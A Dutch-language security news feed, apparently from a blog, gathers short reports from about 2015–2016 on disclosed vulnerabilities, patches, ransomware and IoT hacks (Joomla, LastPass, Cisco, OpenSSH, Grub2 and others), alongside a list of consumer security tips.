    De drone is vernoemd naar het nummer "Danger Zone" van Kenny Loggins dat in Top Gun werd gebruikt. Als computer maakt de machine gebruik van een Raspberry Pi, volgeladen met allerlei hackingtools om 'over-the-air' protocollen zoals RFID, ZigBee, Bluetooth en wifi aan te vallen. "Over-the-air-aanvallen zijn zeer aantrekkelijk op het moment, omdat er zoveel onvolwassen Internet of Things-producten zijn", zegt Francis Brown van Bishop Fox tegenover eWeek.

  • joomla logoEr is ernstig lek gevonden in een de gebruikte Joomla extensie aiContactSafe. Het open source CMS (content management system) is vaker doelwit van veiligheidsonderzoekers maar in dit geval door blackhat hackers. De plugin aiContactSafe (com_aicontactsafe) is erg populair is en wordt gebruikt in meer dan 730.000 websites! Het lek wordt sinds 18 juli 2016 gebruikt door hackers!

    De Hacker die het lek vond staat bekend als xbadgirl21. Ze maakte een YouTube video als bewijs. In een live demonstratie laat ze zien dat ze een PHP shell op een live-websites, kan uploaden.  Het uploaden van bestanden is niet het enige lek wat gevonden is in aiContactSafe. Ook laat iemand via pastebin een SQL-injectie \lek zien. Deze is bekendgemaakt op dezelfde datum! Meer details zijn te vinden op cxsecurity.com

  • server attackCybercriminelen hebben in de eerste helft van dit jaar goudgeld verdiend door hun werkterrein uit te breiden van client-side exploits naar server-side exploits. Daarnaast wordt vaker versleuteling gebruikt om activiteiten op een bedrijfsnetwerk te maskeren. Hierdoor zijn organisaties niet voorbereid op ransomware-aanvallen. Dat blijkt uit het Cisco 2016 Midyear Cybersecurity Report. Dat rapport is gebaseerd op veertig miljard dagelijkse netwerkmetingen wereldwijd.

    Aanvallers gebruiken steeds vaker serverlekken om ransomware te verspreiden. vooral JBoss-servers zijn een gewild doelwit.

  • lastpass logoGoogle-beveiligingsonderzoeker Tavis Ormandy claimt een op afstand te gebruiken lek in de populaire wachtwoordmanager LastPass te hebben gevonden. Volgens hem gaat het om een 'complete remote compromise'.

    Er zijn nog geen verdere details over de kwetsbaarheid bekend, de onderzoeker heeft tot nu toe alleen via Twitter laten weten dat hij een rapport met zijn bevindingen naar LastPass heeft gestuurd. Het lijkt erop dat hij het lek in korte tijd heeft gevonden, omdat hij vijf uur na de aankondiging dat hij naar kwetsbaarheden in de software gaat zoeken de betreffende tweet uitstuurde.

  • TSA logoHackers zijn erin geslaagd de loper van de Amerikaanse Transportation Security Administration (TSA) na te maken die wordt gebruikt voor het openen van door de TSA erkende sloten en hebben de blauwdruk ervan online gezet. De TSA is belast met veiligheidscontroles op Amerikaanse vliegvelden.

    Om bagage te inspecteren heeft de overheidsdienst de bevoegdheid om sloten van koffers en tassen te forceren. In het geval het om een door de TSA erkend en geaccepteerd slot gaat kan die via een loper zonder schade worden geopend.

  • top 10Ondertussen is de computer al enkele decennia ingeburgerd in onze maatschappij. Beveiliging van je apparaten en je gegevens is in die periode alleen maar belangrijker geworden. Zelfs nu we bijna dagelijks onze pc opstarten of een smartphone ter hand nemen, weten we niet altijd even goed wat we moeten doen om daar op een verantwoorde manier mee om te gaan. Met deze 10 tips werp je een solide muur op tussen jouw digitale leven en cybernauten van kwade wil en andere beproevingen. 

    1. Blijf alert voor misleiding
    Een van de meest succesvolle manieren waarop cybercriminelen je computer infiltreren is social engineering. Daar komt vaak geen geavanceerd programmeerwerk aan te pas, psychologie des te meer. Hackers zetten alles in het werk om jou te manipuleren, om je zo op een dubieuze link te laten klikken of je gegevens nietsvermoedend vrij te geven. Spijtig genoeg tuint een aanzienlijk deel van de Belgen daar nog altijd in. Daarom: blijf altijd alert, zeker als je een aanbod krijgt dat te goed klinkt om waar te zijn.

    2. Gebruik een sterk wachtwoord
    Laat je niet hacken omdat je wachtwoord te voorspelbaar is. Er bestaan methodes om een sterk wachtwoord te creëren dat je niet na vijf minuten vergeet. Ook voor je smartphone is het mogelijk om een pin in te stellen die langer is dan vier cijfers, en daardoor moeilijker te kraken.

  • hackerone logoBedrijven zoals Twitter, Uber en Dropbox belonen sinds enige tijd hackers en beveiligingsonderzoekers voor het rapporteren van kwetsbaarheden in hun websites en webapplicaties. Hiervoor maken ze gebruik van het platform HackerOne, dat onder andere door twee Nederlanders werd opgericht.

    Voor het melden van beveiligingsproblemen ontvangen de onderzoekers een financiële beloning. Inmiddels zijn er 1714 beveiligingslekken via HackerOne openbaar gemaakt. Indiase onderzoekers van beveiligingsbedrijf Fallible konden 1359 van deze kwetsbaarheden classificeren, zodat ze konden zien wat voor problemen het vaakst worden gemeld. Dan blijkt dat cross-site scripting het meest voorkomende probleem is.

  • Lenovo bios lekHet beveiligingslek in de bios van Lenovo ThinkPad-laptops blijkt ook in de systemen van HP, Gigabyte en andere fabrikanten aanwezig te zijn. Vorige week waarschuwde Lenovo voor de kwetsbaarheid, waarvoor nog altijd geen beveiligingsupdate beschikbaar is.

    Het Nationaal Cyber Security Center (NCSC) volgde maandag met een waarschuwing. Via de kwetsbaarheid kan een aanvaller met fysieke toegang of beheerderstoegang het bios manipuleren om bijvoorbeeld de opstartprocedure van een computer te beïnvloeden. Lenovo liet weten dat het de kwetsbare bios-code niet zelf had ontwikkeld, maar die van een andere partij afkomstig was die nog niet is geïdentificeerd.

  • Een nieuw ransomware-exemplaar voor het Android-platform blijkt ook in staat te zijn om slimme televisies voor losgeld te versleutelen. Dat laat het Japanse anti-virusbedrijf Trend Micro weten. De ransomware wordt Frantic Locker genoemd. De eerste variant verscheen in mei vorig jaar.

    Sindsdien zijn er meer dan 7.000 varianten aangetroffen. Om zich te verspreiden maakt Frantic Locker gebruik van sms-berichten en kwaadaardige links. De laatste variant vergrendelt Android-apparaten in de naam van een willekeurige opsporingsdienst en stelt dat het slachtoffer een misdrijf heeft begaan. Om weer toegang tot het systeem te krijgen moet er 200 dollar in iTunes-cadeaubonnen worden betaald.

  • contactloos betalenOp internet en Londense zwarte markten worden apparaatjes aangeboden waarmee criminelen tot 15 contactloze betaalpassen in een seconde kunnen klonen, zo melden de Daily Mail en Daily Star. Het apparaatje, de Contactless Infusion X5, kost 500 pond, inclusief software en lege passen.

    Het laat criminelen kaartnummer, naam kaarthouder en adresgegevens van 8 centimeter afstand opvangen. Vervolgens kunnen de gestolen gegevens op een lege pas worden geplaatst, waarmee criminelen kunnen betalen. De Daily Mail stelt dat het apparaatje waarschijnlijk specifiek is ontwikkeld om de steeds populair wordende contactloze bankpas aan te vallen. Volgens de aanbieders van de Contactless Infusions X5 is het de eerste skimmer voor contactloze bankpassen.

    Bron: Security.nl

  • mitsubishi phev hackBeveiligingsonderzoekers zijn erin geslaagd om het alarm van een Mitsubishi Outlander uit te schakelen door het protocol van de mobiele app te reverse engineeren en een Alarm Off-commando te verzenden naar de auto.

    Volgens PenTestPartners is de hack mogelijk, omdat Mitsubishi voor de Outlander een wifi-toegangspunt gebruikt voor de verbinding met de auto, in plaats van de veel gebruikelijkere mobiele internetverbinding. Omdat het wachtwoord bestaat uit een beperkt aantal tekens, is het vrij eenvoudig te kraken.

  • DCS 930L wificameraBeveiligingsonderzoekers van het bedrijf Senrio hebben een lek in de firmware van de D-Link DCS 930L-wificamera gevonden, dat het op afstand uitvoeren van willekeurige code mogelijk maakt. Aan een patch wordt nog gewerkt.

    De kwetsbaarheid betreft een stack overflow die kan worden veroorzaakt door een enkel commando dat assembly code bevat. Daardoor kan een aanvaller kwaadaardige code op het apparaat uitvoeren en bijvoorbeeld het wachtwoord aanpassen om op afstand toegang tot de camera te krijgen. Een sterk wachtwoord is geen toereikende verdediging daartegen, zo stelt Senrio.

  • netflixNetflix is begonnen met het resetten van de wachtwoorden van sommige gebruikers wegens een ouder datalek bij een ander internetbedrijf. Volgens Netflix gaat het om een voorzorgsmaatregel om te voorkomen dat gelekte wachtwoorden worden gebruikt om Netflix-accounts over te nemen.

    In de verstuurde e-mail stelt Netflix dat de inloggegevens van de gebruiker mogelijk bij een ander internetbedrijf zijn buitgemaakt. Het gaat om een ouder datalek, maar de naam van het bedrijf in kwestie wordt niet genoemd.

  • linkedin logoLinkedIn-gebruikers kunnen sinds kort controleren of hun gegevens deel uitmaken van de inloggegevens die zijn buitgemaakt in de hack van 2012. Beveiligingsonderzoeker Troy Hunt heeft de gegevens op zijn site 'have I been pwned' geplaatst.

    Hunt schrijft dat hij opzettelijk een tijd gewacht heeft voordat hij de database op zijn site plaatste. Hij wilde eerst nagaan of de gegevens zich zouden verspreiden; dit leek nu inderdaad te gebeuren. Hunt had eerder bijvoorbeeld de beslissing genomen om de gegevens uit de VTech-hack permanent van zijn site te verwijderen, omdat hij samen met twee anderen de enige partij was die de gegevens in handen had.

  • image magickWebsites worden op dit moment aangevallen via een beveiligingslek in ImageMagick dat deze week werd onthuld en waarvoor vrijdag een update verscheen. ImageMagick is een softwarebibliotheek voor het verwerken van afbeeldingen en wordt door een groot aantal websites en progamma's gebruikt.

    Websites die toestaan dat hun gebruikers afbeeldingen uploaden, bijvoorbeeld avatars of profielfoto's, en deze bestanden via ImageMagick verwerken, lopen risico. Een aanvaller kan in het ergste geval de website en webserver door het uploaden van een kwaadaardige afbeelding overnemen. Beveiligingsbedrijf Sucuri meldt nu dat het aanvallen op websites heeft waargenomen. Aanvallers blijken automatisch op websites te zoeken naar de mogelijkheid om bestanden te uploaden.

  • adobe flashHet onbekende beveiligingslek in Adobe Flash Player waarvoor deze week een update verscheen is wel degelijk aangevallen, waarvoor aanvallers kwaadaardige Word-documenten gebruikten. Adobe maakte dinsdag bekend dat het met een update voor Flash Player versie 21.0.0.226 en eerder zou komen.

    Volgens het softwarebedrijf bestond er een "exploit" voor de kwetsbaarheid. Via exploits kunnen aanvallers ongepatchte beveiligingslekken aanvallen. In het verleden zijn onbekende lekken in Flash Player vaker aangevallen.

  • jboss logoNetwerkgigant Cisco heeft op internet ruim 2.000 gehackte JBoss-servers ontdekt die van een backdoor zijn voorzien waardoor een aanvaller zeer schadelijke ransomware op het netwerk kan verspreiden en bedrijven zo kan platleggen. Het gaat om de Samas-ransomware, ook bekend als Samsam.

    Een groot aantal organisaties, waaronder de FBIMicrosoft en Intel Security, heeft voor de ransomware gewaarschuwd. In tegenstelling tot traditionele ransomware wordt Samas via gerichte aanvallen verspreid. Aanvallers gebruiken hiervoor kwetsbare JBoss-applicaties en -servers. Vervolgens wordt de server gehackt en het achterliggende netwerk met ransomware geïnfecteerd.

  • blackberry logoEen beveiligingslek in BlackBerry-telefoons maakt het mogelijk voor opsporingsdiensten om via een speciale tool toegang te krijgen en data uit ondermeer het geheugen uit te lezen, zo blijkt uit een document (pdf) van een Amerikaans gerechtshof dat op klokkenluiderssite Cryptome is verschenen.

    De tool in kwestie is ontwikkeld door het Israëlische softwarebedrijf Cellebrite en wordt ook door het Nederlands Forensisch Instituut (NFI) gebruikt. In het document, dat van augustus 2013 dateert, stelt Cellebrite dat het sinds 2012 een oplossing aan de UFED Physical/Logical Analyzer heeft toegevoegd waarmee opsporingsdiensten data van BlackBerry-toestellen kunnen halen.

  • Apple OS X Zero Day Vulnerability Can Bypass System Integrity Protection

    Our researchers recently uncovered a major flaw which allows for local privilege escalation and bypass of System Integrity Protection, Apple’s newest protection feature. It was reported to Apple and patches will be available soon. This zero day vulnerability is present in all versions of Apple’s OS X operating system. SentinelOne’s lead OS X security expert, Pedro Vilaça, is presenting the full findings on this vulnerability today at SysCan360 2016 in Singapore: https://www.syscan360.org/en/speakers/#issue-edd5

    The Vulnerability

    This vulnerability is a non-memory corruption bug that exists in every version of OS X and allows users to execute arbitrary code on any binary. It can bypass a key security feature of the latest version of OS X, El Capitan, the System Integrity Protection (SIP) without kernel exploits. SIP is a new feature, which is designed to prevent potentially malicious software from modifying protected files and folders: essentially to protect the system from anyone who has root access, authorized or not. 

  • Cisco Nexus switchNetwerkgigant Cisco heeft een ernstige kwetsbaarheid in Cisco Nexus-switches gedicht dat was ontstaan door een standaardwachtwoord in het besturingssysteem dat niet kon worden gewijzigd. Via het beveiligingslek kon een aanvaller de apparaten overnemen, zo waarschuwt het Computer Emergency Readiness Team van de Amerikaanse overheid (US-CERT).

    Het probleem was aanwezig in de Cisco Nexus Operating System (NX-OS) Software op Cisco Nexus 3000- en 3500-switches. Volgens Cisco gaat het om een gebruikersaccount dat over een standaard en niet te veranderen wachtwoord beschikt. Dit account wordt tijdens de installatie aangemaakt en kan niet worden aangepast of worden verwijderd zonder dat dit invloed op de werking van het systeem heeft.

  • Het blijkt eenvoudig om rf-dongels voor draadloze toetsenborden en muizen om de tuin te leiden: een aanvaller kan ze toetsaanslagen laten accepteren en zo malware een systeem binnensmokkelen. De dongels van veel fabrikanten zijn kwetsbaar.

    De aanval kan met een usb-dongel van 15 dollar worden uitgevoerd en werkt tot op een afstand van 100 meter, constateerde Bastille Networks, die de kwetsbaarheid beschrijft en hem MouseJack genoemd heeft. Dongels van invoerapparatuur van onder andere Logitech, Dell, HP, Lenovo en Microsoft zijn kwetsbaar. Bij Logitech gaat het om de Unifying Receiver in combinatie met de K360, K400r, K750 en K830. Logitech heeft een softwareupdate uitgebracht om het probleem te verhelpen.

  • nissan leaf hackHet is mogelijk om zonder autorisatie de klimaatcontrole van de Nissan Leaf op afstand te bedienen en om informatie over de auto te onderscheppen. Dat ontdekte beveiligings­onderzoeker Troy Hunt. Samen met een compagnon demonstreert hij de bevindingen.

    Hunt ontdekte het lek tijdens een workshop die hij gaf in Noorwegen. Tijdens de workshop behandelt hij zestien verschillende manieren om in te breken op systemen waar ontwikkelaars rekening mee moeten houden. Een van de zaken die hij onder de loep neemt, is het onderzoeken, onderscheppen en besturen van api-requests tussen applicaties zoals op een smartphone en services die op een andere server draaien en iets uitlezen of aansturen. Dat is waar de workshop interessant begon te worden, schrijft hij op zijn blog.

  • simplisafe logoEen beveiligingsonderzoeker heeft een kritieke kwetsbaarheid in een draadloos inbraakalarm ontdekt (pdf), waardoor het mogelijk is om het systeem op afstand uit te schakelen. Het gaat om het inbraakalarm van fabrikant SimpliSafe. Het systeem bestaat uit allerlei sensoren, zoals rook- en bewegingsmelders, en is via een smartphone-app te bedienen. Om het SimpliSafe-systeem in of uit te schakelen moet er een pincode worden ingevoerd.

    De pincode wordt draadloos en onversleuteld via de keypad naar het basisstation verstuurd, zo ontdekte onderzoeker Andrew Zonenberg van beveiligingsbedrijf IOActive. Hij slaagde erin om met apparatuur van zo'n 250 dollar de verstuurde data met de pincode op te slaan en op een later moment af te spelen. Zo is het mogelijk om het alarm op afstand uit te schakelen.

  • Trane ComfortLink IIBeveiligingslekken in een slimme thermostaat van Trane maakten het mogelijk om met een standaardwachtwoord in te loggen het apparaat en om via een bufferoverflow-aanval willekeurige code uit te voeren. Het duurde meer dan een jaar voordat er een oplossing kwam.

    Volgens de tijdlijn van het Talos-beveiligingsteam van Cisco werd de eerste kwetsbaarheid in april 2014 aan het Amerikaanse bedrijf Trane gemeld. Het bedrijf had een voorgeprogrammeerd standaardwachtwoord gebruikt in zijn ComfortLink II-thermostaat, waarmee een aanvaller via een ssl-verbinding op afstand op het apparaat kon inloggen. Ook was het mogelijk om via twee bufferoverflow-kwetsbaarheden specifieke geheugensegmenten te overschrijven, waardoor mogelijk willekeurige code kon worden uitgevoerd. Trane kwam echter pas in april 2015 met een oplossing voor twee van de drie kwetsbaarheden en voerde in januari nog een ronde updates door om ook het laatste probleem op te lossen.

  • skype logoEen Trojaans paard dat bij gerichte aanvallen tegen onder andere Amerikaanse organisaties is ingezet, heeft het vooral op Skype-gebruikers binnen deze organisaties voorzien. Dat meldt beveiligingsbedrijf Palo Alto Networks. De T9000 Trojan, zoals de malware wordt genoemd, verspreidt zich via kwaadaardige rtf-documenten. De documenten maken gebruik van bekende kwetsbaarheden in Microsoft Office die in 2012 en 2015 door Microsoft werden gepatcht.

  • contactloos betalenMet contactloos betalen blijken veel grotere bedragen ongemerkt te kunnen worden afgeschreven dan banken en consumenten denken. Dat blijkt na een test met een mobiele pinautomaat door de Consumentenbond. Volgens de Consumentenbond is het eenvoudig een mobiel betaalapparaat aan te vragen en hier misbruik van te maken.

    "Volgens de banken en de instructievideo van Betaalvereniging Nederland kunnen consumenten boven de 50 euro niet meer contactloos betalen, maar kunnen ze alleen betalen door de pas in de betaalautomaat te steken en de pincode te gebruiken. Maar dat blijkt niet zo te zijn", aldus de consumentenorganisatie. "In principe kunnen consumenten ieder bedrag contactloos betalen en dus voor elk bedrag contactloos gerold worden door criminelen die naast de pas ook de pincode in handen hebben."

  • torEen instelling van de webserversoftware Apache kan ervoor zorgen dat informatie van Tor-servers lekt, zo waarschuwt een beveiligingsonderzoeker. Voor het opzetten van een server op het Tor-netwerk kan Apache worden gebruikt. In veel gevallen wordt Apache geleverd met een feature genaamd 'mod_status'.

    Het is een pagina die allerlei statistieken weergeeft, zoals uptime, verkeer, ingeschakelde virtuele hosts en actieve http-verzoeken. Het is standaard alleen toegankelijk voor localhost. De Tor-software draait echter op localhost. Daardoor is de statuspagina van de Tor-server via het internet toegankelijk. Volgens de onderzoeker zou een aanvaller in dit geval gevoelige requests kunnen monitoren, de lengtegraad van de server kunnen bepalen als de tijdszone is ingesteld en mogelijk zelfs het ip-adres achterhalen als een clearnet Virtual Host aanwezig is.

  • magento logoOnderzoekers van Sucuri hebben een ernstige Cross Site Scripting kwetsbaarheid gevonden in Magento. Onder de juiste omstandigheden kan de kwetsbaarheid gebruikt worden om het administrator account over te nemen.

    De kwetsbaarheid is aanwezig in Magento CE versies voor 1.9.2.3 en Magento EE versies voor 1.14.2.3. Magento heeft een CVSS score van 9.3 (Critical) toegekend aan de kwetsbaarheid.

    Hoewel Cross Site Scripting kwetsbaarheden al geruime tijd bekend zijn en zowel op de OWASP als de Certified Secure checklists zijn opgenomen komen ze helaas nog veelvuldig voor.

  • sslHet projectteam achter OpenSSL komt deze week met een patch voor twee kwetsbaarheden, waaronder een in de categorie 'hoog' als het gaat om de ernst van het lek. Dit is een niveau onder 'kritiek'. Het is nog niet duidelijk om welke kwetsbaarheden het precies gaat.

    De versies die de kwetsbaarheden moeten opheffen zijn 1.0.2f en 1.0.1r, deze komen donderdag beschikbaar. Er zijn geen aanvullende details bekend, enkel dat het gaat om twee kwetsbaarheden met de inschatting 'hoog' en 'laag'. OpenSSL hanteert vier niveaus om de ernst van een kwetsbaarheid in te schatten, waarbij 'laag' het laagste niveau is en 'kritiek' het hoogste niveau. Het wordt dan ook aangeraden om een update uit te voeren, als de patch beschikbaar is.

  • Ook ik krijg regematig van die vervelende phishingmail (zie onderstaande e-mail afbeelding). Gelukkig heb ik een goed spam filter maar die werkt niet altijd! Aan de hand van een persoonlijk voorbeeld wil ik uitleggen wat phishing mail is en hoe je kun je misbruik verkomen. De manier waarop internetoplichters je proberen te verleiden om op phishing-links te klikken, wordt steeds vernuftiger! De onderstaande mail is gemeld bij de Rabobank!

    rabo phishingmail

  • linux lekVandaag is er voor Linux een beveiligingsupdate verschenen die een kwetsbaarheid verhelpt waardoor een lokale aanvaller rootrechten op het systeem kan krijgen. De kwetsbaarheid werd ontdekt door beveiligingsbedrijf Perception Point. Volgens de onderzoekers is het beveiligingslek al sinds 2012 in de Linux-kernel aanwezig en zijn naar schatting tientallen miljoenen Linux-pc's en servers en 66% van alle Android-toestellen kwetsbaar.

    Via de kwetsbaarheid kan een aanvaller met verminderde rechten rootrechten op het systeem krijgen. Een proces dat op een vrij snelle computer nog altijd 30 minuten in beslag neemt. Volgens de onderzoekers speelt tijd bij een rechtenlek als dit echter geen rol. Om de kwetsbaarheid uit te buiten moet een aanvaller lokale toegang tot het systeem hebben, of moet er bijvoorbeeld een kwaadaardige app zijn geïnstalleerd.

  • osx gatekeeperBeveiligingsonderzoeker Patrick Wardle stelt dat de OS X-beveiligingssoftware Gatekeeper nog steeds lek is na een recente patch van Apple. Het zou nog steeds mogelijk zijn om kwaadaardige code uit te voeren. Apple zou werken aan een uitgebreide oplossing.

    Wardle, die al eerder een vergelijkbaar lek in Gatekeeper heeft vastgesteld, laat aan Threatpost weten dat de problemen door de meest recente patch nog steeds niet zijn opgelost. In eerste instantie had hij vastgesteld dat Gatekeeper bij installatie van nieuwe programma's alleen het eerste uitvoerbare bestand op een geldig certificaat controleert. Dit zou echter eenvoudig te omzeilen zijn door het eerste bestand een tweede, kwaadaardig bestand te laten uitvoeren. Dit zou vervolgens niet door Gatekeeper opgemerkt worden.

  • opensshBeveiligingsonderzoekers van Qualys hebben een lek vastgesteld in de OpenSSH-client. Deze maakt het voor een aanvaller mogelijk om met een kwaadaardige ssh-server het geheugen van de client uit te lezen, waardoor onder andere beveiligingssleutels uit kunnen lekken.

    De site Undeadly laat weten dat versies 5.4 tot 7.1 van de OpenSSH-client getroffen zijn door de kwetsbaarheid, die het identificatienummer cve-2016-0777 heeft meegekregen. Er is inmiddels een patch beschikbaar in de 7.1p2-release van de software.

  • silverlightEen zero day-lek in Silverlight is vorig jaar gebruikt voor aanvallen op Windowsgebruikers, hoewel Microsoft zegt dat het niet met dergelijke aanvallen bekend is. De kwetsbaarheid werd door het Russische anti-virusbedrijf Kaspersky Lab ontdekt en gisterenavond door Microsoft gepatcht.

    Silverlight is de browserplug-in van Microsoft voor het afspelen van online videocontent. In Security Bulletin MS16-006 stelt Microsoft echter dat het niet met aanvallen op Windowsgebruikers bekend is. Vandaag publiceerde Kaspersky Lab een artikel over hoe het de kwetsbaarheid ontdekte en hoe die bij aanvallen was ingezet. Het begon naar aanleiding van een artikel van Ars Technica over het gehackte Italiaanse bedrijf Hacking Team. Uit de e-mails die van het bedrijf online waren gezet bleek dat een onderzoeker genaamd Vitaliy Toropov een exploit voor een onbekend Silverlight-lek had aangeboden.

  • trendmicro logoEen beveiligingsonderzoeker van Google heeft kritieke kwetsbaarheden in de virusscanner van Trend Micro ontdekt waardoor websites de computer van gebruikers volledig konden overnemen en opgeslagen wachtwoorden in de wachtwoordkluis van Trend Micro konden bekijken.

    Dat heeft Google-onderzoeker Tavis Ormandy zelf via Twitter bekendgemaakt. Ormandy vindt vaker kwetsbaarheden in anti-virusprogramma's, waaronder AVGSophosESETKasperskyLab en Avast. In het geval van Trend Micro had hij slechts 30 seconden nodig om het eerste ernstige beveiligingslek te vinden waardoor een aanvaller de computer kon overnemen. Het probleem zit in de Password Manager, dat onderdeel van Trend Micro Antivirus is. Websites kunnen verzoeken naar de Password Manager sturen die vervolgens op de computer van de gebruiker worden uitgevoerd. Daarbij gebruikte Trend Micro een functie die het uitvoeren van commando's op de computer zeer eenvoudig maakt.

  • fritz!boxEen kritieke kwetsbaarheid in de FRITZ!Box-modemrouter van fabrikant AVM waardoor aanvallers het toestel op afstand konden overnemen is vorig jaar gepatcht, zo is nu bekend geworden. De kwetsbaarheid bevond zich in een service genaamd 'dsl_control'.

    Door verbinding met deze service te maken kon een aanvaller willekeurige code op de modemrouter uitvoeren en rootrechten krijgen. Vervolgens zou het mogelijk zijn om verkeer van gebruikers af te luisteren, telefoonnummers te bellen en eventueel een backdoor te installeren om langere tijd toegang tot het apparaat te behouden, aldus onderzoekers van het beveiligingsbedrijf RedTeam Pentesting.

    De kwetsbaarheid werd vorig jaar februari ontdekt en een maand later aan AVM gerapporteerd. In juli begon AVM met het uitrollen van updates voor de FRITZ!Box. In eerste instantie was het plan om de details over de kwetsbaarheid in november te publiceren, maar dat werd uitgesteld om ervoor te zorgen dat meer modemrouters de nieuwe firmware-update hadden ontvangen waarmee het probleem wordt verholpen.

  • wordpress securityEr is een beveiligingsupdate voor het populaire contentmanagementsysteem (cms) WordPress uitgekomen die een kwetsbaarheid verhelpt waardoor een aanvaller websites kan overnemen. Het gaat om een cross-site scripting-kwetsbaarheid, zo laten de ontwikkelaars van WordPress weten.

    Het lek werd door een externe beveiligingsonderzoeker via het bugbeloningsprogramma HackerOne aan WordPress gemeld. Verder zijn er 52 niet-security gerelateerde bugs verholpen. Gebruikers krijgen het dringende advies om hun website of websites direct te updaten naar WordPress 4.4.1.

  • ransomwareOnderzoekers hebben de allereerste ransomware voor Windows ontdekt die volledig in JavaScript is gemaakt en met een aantal kleine aanpassingen ook op Mac- en Linuxcomputers kan werken. De ransomware heet Ransom32 en wordt als 'Ransomware as a Service' (Raas) aangeboden.

    Via deze dienst kunnen cybercriminelen eenvoudig een eigen versie van de ransomware downloaden en verspreiden. De makers van Ransom32 geven afnemers het advies om niet al te hoge bedragen voor het ontsleutelen van versleutelde bestanden te vragen, omdat slachtoffers anders niet zullen betalen. Een kwart van het bedrag dat slachtoffers betalen gaat naar de makers. Bij het genereren van een Ransom32-versie kunnen cybercriminelen voor verschillende opties kiezen, zo meldt anti-virusbedrijf Emsisoft, dat de ransomware analyseerde.

  • windows10Nieuwe Windows 10-computers beschikken over ingebouwde schijfversleuteling die standaard staat ingeschakeld als gebruikers met hun Microsoft-account inloggen, maar in dit geval wordt de herstelsleutel om de schijf te ontsleutelen in de cloud bewaard. Daarvoor waarschuwt The Intercept.

    "De gouden standaard in schijfversleuteling is end-to-end-encryptie, waar alleen de gebruiker zijn schijf kan ontsleutelen. Dit is wat de meeste bedrijven gebruiken en het lijkt goed te werken", zegt Matthew Green, cryptografieprofessor aan de Johns Hopkins Universiteit. "Er zijn zeker gevallen waarbij het handig is om een back-up van je sleutel of wachtwoord te hebben. In die gevallen kun je ervoor kiezen om een bedrijf de informatie te laten bewaren. Maar het overhandigen van je sleutels aan een bedrijf als Microsoft verandert de beveiligingseigenschappen van een schijfversleutelingssysteem."

  • Kabel Deutschland routerDe Duitse ontwikkelaar Alexander Graf vond wachtwoorden in het geheugen van zijn eigen router. Deze gaven toegang tot het onderhoudsnetwerk van Vodafone-dochter Kabel Deutschland. Daarmee kon hij ongehinderd rondkijken op de routers van 2,8 miljoen Duitsers.

    Alexander Graf ontdekte de kwetsbaarheid toen hij in zijn eigen router op zoek was naar de inloggegevens voor zijn voip-toegang, die hij wilde gebruiken om zijn eigen hardware aan te sluiten. Hij trof een verstopte netwerkverbinding met de naam wan0 aan, die deel van het onderhoudsnetwerk van de Duitse aanbieder bleek te zijn. Via dit netwerk kon hij zich via telnet en later via ssh toegang verschaffen tot de routers van 2,8 miljoen andere gebruikers. De toegangswachtwoorden van deze routers waren deels in plaintext opgeslagen in het geheugen van zijn eigen router. Deze waren voor alle apparaten gelijk.

  • encrytptieOnderzoekers hebben een aanval gedemonstreerd waarmee het mogelijk is om het encryptiewachtwoord van versleutelde Linuxsystemen in handen te krijgen. De aanval vereist wel dat de aanvaller fysieke toegang tot het systeem heeft. In dit geval kan er code worden toegevoegd om het wachtwoord te onderscheppen.

    In 2009 demonstreerde onderzoekster Joanna Rutkowska de Evil Maid-aanval, waarbij een aanvaller met fysieke toegang het encryptiewachtwoord van met TrueCrypt-versleutelde systemen kon achterhalen. Dergelijke aanvallen kunnen volgens onderzoekers van beveiligingsbedrijf Gotham Digital Science op elk besturingssysteem worden uitgevoerd. Onderzoekers van het bedrijf besloten voor hun onderzoek naar de Linux Unified Key Setup (LUKS) te kijken, de schijfversleuteling voor Linux. Ze hebben hun aanval omgedoopt tot 'EvilAbigail', waarbij Abigail een Amerikaanse term voor bediende is.

  • joomla logoDe makers van het contentmanagementsysteem Joomla hebben een beveiligingsupdate uitgebracht die een kritieke kwetsbaarheid in de software verhelpt waardoor een aanvaller kwetsbare websites kan overnemen. Beheerders krijgen dan ook het advies om de update direct te installeren.

    Vorige week verscheen er ook een update voor Joomla, toen voor een kwetsbaarheid die actief werd aangevallen. De oorzaak van deze kwetsbaarheid blijkt een bug in PHP zelf te zijn. PHP had deze kwetsbaarheid zelf al in september van dit jaar gepatcht via PHP 5.4.45, 5.5.29, 5.6.13 en PHP 7. Joomla-websites die op een kwetsbare versie van PHP draaiden konden via de kwetsbaarheid worden aangevallen.

  • jupinerJuniper, een maker van netwerkapparatuur, laat weten dat het 'ongeautoriseerde code' heeft ontdekt in zijn ScreenOS-software. Deze maakte het voor een aanvaller mogelijk om op afstand beheerderstoegang te verkrijgen op bepaalde apparaten en om vpn-verkeer te ontsleutelen.

    Juniper meldt dat de kwetsbaarheden aan het licht zijn gekomen tijdens een interne code review van de ScreenOS-software, deze wordt gebruikt in NetScreen-apparaten die dienstdoen als firewall en vpn-verbindingen mogelijk maken. Het probleem wordt veroorzaakt door code waarvan het bedrijf niet kan aangeven waar deze vandaan komt. Dit is opmerkelijk, omdat deze code dus door een derde partij kan zijn toegevoegd aan de software. Onder andere de site CIO meldt dat het incident de sporen vertoont van een actie van een overheid.

  • backspaceEr is een kwetsbaarheid in de Linux-bootloader Grub2 ontdekt waardoor een aanvaller met fysieke toegang tot een systeem zonder wachtwoord kan inloggen. Grub2 is de bootloader die de meeste Linuxsystemen gebruiken. Het nu ontdekte lek is aanwezig in versie 1.98 (uit 2009) tot versie 2.02 (2015).

    Een aanvaller die van de kwetsbaarheid gebruik weet te maken kan zonder geldige gebruikersnaam of wachtwoord inloggen, informatie stelen of een Denial of Service veroorzaken, aldus de advisory.

  • kerberosEen beveiligingsonderzoeker schrijft dat Kerberos, het authenticatieprotocol van Windows, vatbaar is voor een aanval waarbij een kwaadwillende gebruiker onder andere zichzelf beheerdersprivileges toe kan kennen en nieuwe gebruikers aan kan maken. Het lek zou niet te dichten zijn.

    Het Kerberos-protocol maakt het mogelijk gebruikers op een netwerk te au­then­ti­ceren zonder dat daarbij wachtwoorden verstuurd worden. Er wordt daarbij gebruikgemaakt van een key distribution center, dat zorgt voor de nodige sleutels. Het is de onderzoeker van het Dfir-Blog gelukt om het wachtwoord van een account genaamd 'krbtgt' te gebruiken om een geheime sleutel aan te maken. Dit account wordt standaard aangemaakt en wordt door Microsoft aangemerkt als een 'service account'.

  • joomla exploit payloadHet contentmanagementsysteem Joomla is kwetsbaar voor remote code execution. Gebruikers van versies 1.5 tot 3.4.5 wordt aangeraden om een update uit te voeren. Er wordt door aanvallers al gebruikgemaakt van de kwetsbaarheid.

